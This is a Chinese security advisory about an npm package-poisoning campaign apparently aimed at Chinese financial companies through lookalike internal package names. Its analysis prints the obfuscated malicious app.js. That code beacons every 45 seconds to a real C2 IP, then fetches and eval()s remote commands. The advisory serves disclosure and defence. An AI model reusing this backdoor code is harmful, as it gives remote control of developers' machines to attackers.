首起针对国内金融企业的开源组件投毒攻击事件
发布时间 - 2023-08-15 14:00:43 点击率:538次简述
2023年8月9日,墨菲监控到用户名为 snugglejack_org (邮件地址:SnuggleBearrxx@hotmail.com)的用户发布到 NPM 仓库中的 ws-paso-jssdk 组件包具有发向 https://ql.rustdesk[.]net 的可疑流量,经过确认该组件包携带远控脚本,从攻击者可控的 C2 服务器接收并执行系统命令,该组件包于2023年8月10日7点 21 分从 NPM 仓库下架。
经过持续跟踪发现,该投毒者继续向 NPM 仓库继续发布了 pingan-vue-floating 等类似恶意组件包,投毒包的恶意 C2 地址改为了 62.234.32.226 ,此 IP 为以北京腾讯云提供,并且投毒包以 pingan、ynf 等命名,很大几率是针对国内厂商(例如中国*安),投毒者通过模拟目标企业内部私有源组件命名进行混淆,进而通过诱导用户企业内部用户下载投毒组件包实现对目标机器的远控入侵,这是目前公开发现的首起针对国内金融企业的开源组件投毒攻击事件。
截至2023年8月14日,投毒包仍可在NPM腾讯源进行下载(见图1),用户可通过 npm ls 判断是否下载了恶意组件,批量检测投毒检测可联系墨菲安全使用产品工具进行全网一键排查,最近正值大型攻防演练,建议大家认真排查。
图1: 腾讯云NPM组件下载地址
投毒分析
以pingan-vue-floating-0.0.7组件为例,该组件包通过 pm2 创建守护线程,每隔 45 秒后向攻击者可控的恶意C2服务器发送请求维持心跳,进而接收并执行攻击者发送的系统命令:
//pingan-vue-floating-0.0.7/app.jsconst key = (37532).toString(36).toLowerCase()+(27).toString(36).toLowerCase().split("").map(function(S){return String.fromCharCode(S.charCodeAt()+(-39))}).join("")+(1166).toString(36).toLowerCase()+(function(){var v=Array.prototype.slice.call(arguments),A=v.shift();return v.reverse().map(function(N,Q){return String.fromCharCode(N-A-10-Q)}).join("")})(43,107,106,169,150,111,106)+(914).toString(36).toLowerCase()+(function(){var k=Array.prototype.slice.call(arguments),D=k.shift();return k.reverse().map(function(r,I){return String.fromCharCode(r-D-8-I)}).join("")})(36,167,112)const url = "http://62.234.32.226:8888"const filename = path.join(os.tmpdir(), "node_logs.txt");const headersCnf = {headers: {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134"}};……functionheartbeat(){const requestData = {hostname: os.hostname(),uuid:machineIdSync({original:true}),os:os.platform(),};sendRequest(url+"/api/index",aesEncrypt(JSON.stringify(requestData)))const task = {uuid:machineIdSync({original:true}),}sendRequest(url+"/api/captcha",aesEncrypt(JSON.stringify(task))).then(result => {try{if (result !== undefined) {const data = JSON.parse(result);const decodedData = Buffer.from(data.code,"base64").toString();eval(decodedData)}}catch (error){}});}functionapp(){const result = checkFile();if (result.exists) {return}else {createTmpFile();setInterval(heartbeat,45000);}}app()
此次事件的攻击者投毒的所有组件列表
Tip:请各单位自行排查!
来源:墨菲安全实验室
最新文章
第十二版《网络安全企业100强》发布
开源推荐算法为什么并不“可靠”?
虹膜写真风靡年轻人:小心泄露敏感个人信息
国内最大IT社区CSDN被挂马,CDN可能是罪魁祸首?
Apache Struts文件上传漏洞 (CVE-2024-53677) 安全风险通告
工信部:关于防范新型勒索病毒Ymir的风险提示
美国报告揭示俄罗斯战略信息攻击:从攻击方法到战略效果
最危险的网络攻击:云勒索软件
个人信息保护合规审计:个人信息删除落地与审计
Forrester:Akamai创新微分段技术引领企业安全升级,实现 152%高ROI
Fortinet发布《2025年网络威胁趋势预测报告》 揭秘四大威胁挑战
榜上有名!360入选2024年天津市网络安全应用场景优秀案例
只需一个暗号,即可戳穿语音克隆骗局
写在IDCC2024数字基础设施国际合作大会之前
IETF的运行方式及RFC的形成
《AI时代深度伪造和合成媒体的安全威胁与对策(2024版)》报告发布
UnitedHealth勒索软件攻击事件应吸取的六个备份教训
网络安全产品奥斯卡 2024年度赛可达优秀产品奖(SKD AWARDS)
“危“”机“并存,五位网络安全大咖预警2025年安全态势
赋能智算未来,CDCE2024国际数据中心展12月5日上海璀璨开幕
俄罗斯黑客组织渗透和利用巴基斯坦黑客组织服务器案揭秘
国家安全部:警惕开源信息成为泄密源头
“清朗·网络平台算法典型问题治理”专项行动中的排名算法
游戏玩家请注意!Winos4.0木马已“潜伏”
2024 DAMS中国数据智能管理峰会即将在上海举办
WAF气数已尽?
网安巨头Palo Alto全球数千防火墙被攻陷:因开发低级错误造成零日漏洞
数字城市AI安全运营中心签约揭牌,360赋能长三角城市安全新篇章
勒索软件忙招人,2024年网络威胁五大新趋势
360发布全球首份《大模型安全漏洞报告》,曝光近40个大模型相关安全漏洞
值得关注的十二大网络安全风险评估工具及选型指南
俄黑客通过“近邻攻击”远程入侵美国企业WiFi网络
四校签约、六家授牌!360与河南高校再摘网络安全人才培育新果实
Apple多个在野高危漏洞在野利用通告
苹果官方警告:零日漏洞攻击瞄准Mac电脑用户
《密码法》颁布五周年:法治成效、实施难点与未来走向
27天!揭秘身份管理中凭证修复为何如此艰难?
微软“清理门户”,禁止杀毒软件访问Windows内核
云原生环境下的七大网络安全威胁及应对建议
透析恶意软件“四大家族”
客服1 